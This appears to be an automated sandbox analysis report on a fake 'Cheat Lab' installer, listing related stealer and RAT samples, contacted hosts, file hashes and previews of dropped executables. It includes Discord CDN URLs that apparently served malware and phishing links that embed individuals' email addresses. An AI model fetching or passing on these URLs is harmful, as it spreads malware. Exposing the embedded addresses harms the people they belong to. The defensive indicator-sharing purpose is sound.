                                                          PO-001.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          rRecibodeenv__o.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          hpS52BJbZU.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          iLN07Ke3n1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          NrYZfaAEZf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Informe_de_pago_-_Transferencia.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          BVVXU2mLIX.exeGet hashmaliciousPredatorBrowse
                                                          • ip-api.com/json/
                                                          QEYqyI220m.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          cdn.discordapp.comhttps://cdn.discordapp.com/attachments/1166832003316985947/1166832321379434547/svchost_1_5.exe?ex=65a83548&is=6595c048&hm=abde5554f76f9c8e91642465859def2f2f98d7eac794255c3d86322349778a6e&Get hashmaliciousFlawedAmmyyBrowse
                                                          • 162.159.130.233
                                                          grekjJu4PM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                          • 162.159.130.233
                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                          • 162.159.129.233
                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.1804.16541.exeGet hashmaliciousAsyncRATBrowse
                                                          • 162.159.134.233
                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.18837.22068.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.129.233
                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.3528.4133.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                          • 162.159.133.233
                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.29072.15011.exeGet hashmaliciousAsyncRATBrowse
                                                          • 162.159.134.233
                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.30665.679.exeGet hashmaliciousAsyncRATBrowse
                                                          • 162.159.134.233
                                                          injector_resou_nls..scr.exeGet hashmaliciousAsyncRAT, Clipboard Hijacker, zgRATBrowse
                                                          • 162.159.134.233
                                                          https://cdn.discordapp.com/attachments/1116752307300880517/1191015047179280425/Crypt.zipGet hashmaliciousUnknownBrowse
                                                          • 162.159.133.233
                                                          https://cdn.discordapp.com/attachments/1116752307300880517/1191015047179280425/Crypt.zipGet hashmaliciousUnknownBrowse
                                                          • 162.159.129.233
                                                          4dej5mvuGp.exeGet hashmaliciousRisePro StealerBrowse
                                                          • 162.159.130.233
                                                          6101XOxMbY.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRATBrowse
                                                          • 162.159.134.233
                                                          Sz8KLg559F.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRATBrowse
                                                          • 162.159.130.233
                                                          DG8gGqfke1.exeGet hashmaliciousUnknownBrowse
                                                          • 162.159.135.233
                                                          6JrdNYGEPZ.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, SmokeLoader, StealcBrowse
                                                          • 162.159.129.233
                                                          OIpWHA8mdz.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                          • 162.159.135.233
                                                          C7e8AncaYu.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRATBrowse
                                                          • 162.159.134.233
                                                          XrNOw4sxMG.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                          • 162.159.134.233
                                                          aiJQkLaTCf.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, StealcBrowse
                                                          • 162.159.135.233
                                                          ip-api.comfile.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Agonied_Grabber_V2.4.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1
                                                          RGyT9gS5Wp.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 208.95.112.1
                                                          FedEx_AWB#_8116010123507.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG2110017156060.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211003417156060.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211001715606.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 208.95.112.1
                                                          Complexcaresolutions-ACH#80908.hTmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          https://r20.rs6.net/tn.jsp?f=0014g8CimRsyfsXhRcokS4gCGfNQQGnJnYWf2D3I4dBh7hSeER3X0T-g-BR44FifTHYOMOheYbnWB5duWTQ7ZE2GLeKzS3RgXmolpTBnsvpJRfEQRFdVlRBOFenEvkJVsG60XzEapPM_rp-2eqQc0ASO-2Sx6tVG2MICOpELsnkP7OSvLjzNsvV9Q==&c=&ch==&__=/asdf/YnJ5Y2Uuam9obnNvbkBzdGVwYW4uY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          051223_JOK_JOKSP67123_MSI_-_Marine_Spares_International.xls.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          MV_CHARLENE_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Notificaci#U00f3n_Transferencia_Interbancaria.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • 208.95.112.1
                                                          PO-001.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          https://r20.rs6.net/tn.jsp?f=001hpH3iFffMveYjStO_X-MvG9RPTAIiC6hH4aTZU7rVzcpvUP_ICqo36RUMXQVfsUqrm4g7z-3oSj0KQANPFyd7MBjWWS-bv6QWs7PqyxIwA-IwCQs4kQi1tfcYzCaVnvmTt7ZwML9C70thbxO1_yIGfcUEvxfwQDq&__=bkorn@drinkbodyarmor.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          rRecibodeenv__o.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          hpS52BJbZU.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          iLN07Ke3n1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          NrYZfaAEZf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TUT-ASUSfile.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Agonied_Grabber_V2.4.exeGet hashmaliciousBlank GrabberBrowse
                                                          • 208.95.112.1
                                                          RGyT9gS5Wp.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 208.95.112.1
                                                          FedEx_AWB#_8116010123507.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG2110017156060.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211003417156060.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211001715606.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 208.95.112.1
                                                          Complexcaresolutions-ACH#80908.hTmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          https://r20.rs6.net/tn.jsp?f=0014g8CimRsyfsXhRcokS4gCGfNQQGnJnYWf2D3I4dBh7hSeER3X0T-g-BR44FifTHYOMOheYbnWB5duWTQ7ZE2GLeKzS3RgXmolpTBnsvpJRfEQRFdVlRBOFenEvkJVsG60XzEapPM_rp-2eqQc0ASO-2Sx6tVG2MICOpELsnkP7OSvLjzNsvV9Q==&c=&ch==&__=/asdf/YnJ5Y2Uuam9obnNvbkBzdGVwYW4uY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          051223_JOK_JOKSP67123_MSI_-_Marine_Spares_International.xls.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          MV_CHARLENE_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          Notificaci#U00f3n_Transferencia_Interbancaria.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • 208.95.112.1
                                                          PO-001.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 208.95.112.1
                                                          https://r20.rs6.net/tn.jsp?f=001hpH3iFffMveYjStO_X-MvG9RPTAIiC6hH4aTZU7rVzcpvUP_ICqo36RUMXQVfsUqrm4g7z-3oSj0KQANPFyd7MBjWWS-bv6QWs7PqyxIwA-IwCQs4kQi1tfcYzCaVnvmTt7ZwML9C70thbxO1_yIGfcUEvxfwQDq&__=bkorn@drinkbodyarmor.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 208.95.112.2
                                                          rRecibodeenv__o.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          hpS52BJbZU.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          iLN07Ke3n1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1
                                                          NrYZfaAEZf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 208.95.112.1

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Config.Msi\6d055d.rbs

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):193434
                                                          Entropy (8bit):6.415097067134009
                                                          Encrypted:false
                                                          SSDEEP:3072:hM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOi+:hBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mhx
                                                          MD5:3B7A4E2DF6D5D43ADC8CFF639CB1F92D
                                                          SHA1:826FF219FF8D48A79CDABCEBADF2A5A15FB1B551
                                                          SHA-256:D0165EF14AC6FA49D4FD2F8AD6322FBAD9507C07E111E7F32F502093D9E2688F
                                                          SHA-512:655A6525C3D346701414E04FFAF117F4249F12748A475C520ED832C259A7F38BD67DAE26061FF0B0F84CBFC3EAB156C5ED0CC5C6D239538EDDD5A4017CC16DB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...@IXOS.@.....@..,X.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{CC73A368-D6F6-4385-86EB-175FBE031BB5}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F1DA0363-909C-400E-A21B-7B2D5946B577}&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}.@......&.{630AA01D-F530-4CBA-8FD1-AF202D37234B}&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}.@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a...

                                                          C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789504
                                                          Entropy (8bit):6.523973330294715
                                                          Encrypted:false
                                                          SSDEEP:12288:ApilpMBddxHYrZsPrXcRF0vqBggQe4Vf5nklLxO4+xMbBn+odCOdQ:QjBx4rZsPUcqh/E4XsK
                                                          MD5:E1985F2668B7617E122FE727315B6D07
                                                          SHA1:FF6F2C6C1BB9456521C08640F324F8E9B7F43A5C
                                                          SHA-256:DB147CF5D4681FE82840A6CCFFB711885724D3792EE7A0D2385AA7E80E2B4B6D
                                                          SHA-512:448E25D33B751CFAE9D6D90B62B208E4002AFB4EC1F09F5ABE0BB99D43E8ECEB26E7EB1A07F2D49817EDA98203246E2766D824910E73916B107A34173579C1E6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~AN.: .: .: ._F$.& ._F#.- ._F%.. ._F!.9 .: !.W .hH%.. .hH$.( .hH#.3 .: .; ..I$.y ..I .; ..I".; .Rich: .........................PE..d...i.e.........."..........P.................@.............................P............`..........................................x.. .......(................j...........@.......>...............................>..................P............................text............................... ..`.rdata..8...........................@..@.data...h!..........................@....pdata...j.......l..................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................

                                                          C:\Program Files\Cheat Lab Inc\Cheat Lab\config

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):143755
                                                          Entropy (8bit):6.131183448575568
                                                          Encrypted:false
                                                          SSDEEP:3072:Tc5IAspbrZSR8NT/dKWmxtwXIgu0i6GJYtKO4:glstrZQ8Cntw4guPJYtKO4
                                                          MD5:181C472257655DE92032B1A786E32FC8
                                                          SHA1:72BAD9D54C6A1FF446B454FDEC0BBDD71B0AAA77
                                                          SHA-256:8A0BEC3073B8FE824871017DB00E200BEAFA17AC3066FA6862810BEAC1F0CA37
                                                          SHA-512:9482650357C4F312E47D217209026EC9427BAA677F24BC6024A89A6BEBE8004AEAA3F7DEB595F3F9452AABACD659EE5AE7AE0B3315A692C3DE1AF0FC0EE5D46A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.LJ..........-.......8...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L................*...L...............*...L...............2).......)...M...-...8...-...8...8.......<...O...-.......X...-...+...B...-.......B...-...)..kB...-...)..kB.......-...3...=...<...<...2...L...X...-...4...5...-...=...-...)..kB...<...3...=...2...D...K.................__gc.....__len.C.......-...-...4...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........S.......-...-...4...>...>...>...>...>...>...>

                                                          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exe

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789504
                                                          Entropy (8bit):6.523973330294715
                                                          Encrypted:false
                                                          SSDEEP:12288:ApilpMBddxHYrZsPrXcRF0vqBggQe4Vf5nklLxO4+xMbBn+odCOdQ:QjBx4rZsPUcqh/E4XsK
                                                          MD5:E1985F2668B7617E122FE727315B6D07
                                                          SHA1:FF6F2C6C1BB9456521C08640F324F8E9B7F43A5C
                                                          SHA-256:DB147CF5D4681FE82840A6CCFFB711885724D3792EE7A0D2385AA7E80E2B4B6D
                                                          SHA-512:448E25D33B751CFAE9D6D90B62B208E4002AFB4EC1F09F5ABE0BB99D43E8ECEB26E7EB1A07F2D49817EDA98203246E2766D824910E73916B107A34173579C1E6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~AN.: .: .: ._F$.& ._F#.- ._F%.. ._F!.9 .: !.W .hH%.. .hH$.( .hH#.3 .: .; ..I$.y ..I .; ..I".; .Rich: .........................PE..d...i.e.........."..........P.................@.............................P............`..........................................x.. .......(................j...........@.......>...............................>..................P............................text............................... ..`.rdata..8...........................@..@.data...h!..........................@....pdata...j.......l..................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\config

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):143755
                                                          Entropy (8bit):6.131183448575568
                                                          Encrypted:false
                                                          SSDEEP:3072:Tc5IAspbrZSR8NT/dKWmxtwXIgu0i6GJYtKO4:glstrZQ8Cntw4guPJYtKO4
                                                          MD5:181C472257655DE92032B1A786E32FC8
                                                          SHA1:72BAD9D54C6A1FF446B454FDEC0BBDD71B0AAA77
                                                          SHA-256:8A0BEC3073B8FE824871017DB00E200BEAFA17AC3066FA6862810BEAC1F0CA37
                                                          SHA-512:9482650357C4F312E47D217209026EC9427BAA677F24BC6024A89A6BEBE8004AEAA3F7DEB595F3F9452AABACD659EE5AE7AE0B3315A692C3DE1AF0FC0EE5D46A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.LJ..........-.......8...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L................*...L...............*...L...............2).......)...M...-...8...-...8...8.......<...O...-.......X...-...+...B...-.......B...-...)..kB...-...)..kB.......-...3...=...<...<...2...L...X...-...4...5...-...=...-...)..kB...<...3...=...2...D...K.................__gc.....__len.C.......-...-...4...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........S.......-...-...4...>...>...>...>...>...>...>

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jsc.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2545
                                                          Entropy (8bit):5.330114603578639
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKlYHKh3oOfHKdHKJHKhBHK5AHKzetTHmtHo6nmHKtXoDH8HKx1qHxLHqH5HZV:iqlYqh3oSqdqJqLq2qzIGtI6mqccqxwK
                                                          MD5:C2EEC3D9A686235E7384C5D76133E31B
                                                          SHA1:FCDB906C01A19E3FDBB6DE0089019ECD6BD3F477
                                                          SHA-256:F3BF3C44AA56C07982676B59716CBD5AC32106AAC3E8960F3C6427C6E67A0DF5
                                                          SHA-512:38601BA0E3B2F9E9F1901C1E9C6BC3FF015D933A59F0DBA193342051864A98962AF47A67842755A1A253DD64E4790DC04805FD2F86D678E1BC85E38CC7E0173F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):113
                                                          Entropy (8bit):4.747584446569125
                                                          Encrypted:false
                                                          SSDEEP:3:YWR4buWsyLBHrpHGR3XL5zk9fQ8W3EwAy/DMXLUcLRJu:YWybuirpH63b5AW+1CQUcS
                                                          MD5:A789AAFDA57850A3DE322E96CEF13DA3
                                                          SHA1:F2976069771FBF3AD3349BDCFC3704B52E556AC0
                                                          SHA-256:710F5CB8865A3B990E736ACB604155CC593E178F8993F1D6DE11A5B7A864E6DF
                                                          SHA-512:424266CC6127D407F5FBBF1B9891D5948176337FDC5CC1F01448B6EDCBE213614BA72488D9B8ACD495095777793CBE40B01C7A15E73D2960DE63A50593F297F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"102.165.48.42"}

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\2[2]

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5
                                                          Entropy (8bit):1.5219280948873621
                                                          Encrypted:false
                                                          SSDEEP:3:hn:h
                                                          MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                          SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                          SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                          SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:0....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\2[2]

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):3182723
                                                          Entropy (8bit):3.588364062799384
                                                          Encrypted:false
                                                          SSDEEP:49152:yYvVqxmNpwMzWoFVKM3K/5/Meh5GtUsLgrpugTNZBaSNSEnls2240UsMF2NfcIiw:J
                                                          MD5:376559BEFAA721CB4B27D1BF5D7CA956
                                                          SHA1:9BA6B8F4CA418552C0C9E753B7F98C2E1DD5AFFF
                                                          SHA-256:DD8AF7D248AC0D43DFCEFED9901AF16F918DECF374E04C9DEC8226ACEC323E30
                                                          SHA-512:7EDBE42FD65E77E3B95F018DD7728F13EDB0EE7C02A6E1DE932C0F164B09FD1C3BE7D9BA318CFC6C3C1F11305722F14EA86E17D646DAB0166774EB5CBB5BB3F4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:85,93,d0,43,50,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,66,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b4,9d,b5,e9,c3,df,b0,97,9a,9d,a0,a5,c0,da,c8,72,62,6a,d8,12d,152,104,133,c6,da,fe,130,e7,f7,e6,13e,fc,ee,ca,db,16b,e9,100,134,10c,cf,c6,c9,138,da,f6,b8,fa,e4,d8,cf,130,f8,d6,145,c6,da,fe,e3,149,f5,e7,13b,fc,ee,ca,fa,171,e3,100,118,10c,cf,c6,e8,13e,d9,f6,14a,fa,e4,d8,ee,136,ff,d6,140,c6,da,fe,e3,149,f8,e7,14f,fc,ee,ca,128,109,e7,ff,69,10c,cf,c6,73,13d,e0,f6,13b,fa,e4,d8,79,135,f8,d6,136,c6,da,fe,8d,14e,f4,e7,130,fc,ee,ca,85,170,cd,ff,130,10c,cf,c6,116,d6,6c,f5,13a,fa,e4,d8,79,135,fe,d6,134,c6,da,fe,9e,bb,ce,bc,13e,fc,ee,ca,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,88,7e,70,43,9b,32,52,6c,85,96,6b,ab,5a,67,62,38,44,74,5a,6d,12b,77,46,35,3d,42,5f,73,55,a7,5a,46,38,a7,71,43,4f,31,4e,6c,112,f1,6c,54,5a,77,62,38,44,d4,5c,6d,4b,77,83,34,32,51,51,63,55

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e...........................................................

                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):946784
                                                          Entropy (8bit):6.628560786473655
                                                          Encrypted:false
                                                          SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                          MD5:848164D084384C49937F99D5B894253E
                                                          SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                          SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                          SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):47584
                                                          Entropy (8bit):6.391877602293662
                                                          Encrypted:false
                                                          SSDEEP:768:DeSZaMT79n3DwU8ZCM2o1QG/n29WERqqJaqW/P8+4W:DeoaElzEZ2fG/nmkK4s+4W
                                                          MD5:94C8E57A80DFCA2482DEDB87B93D4FD9
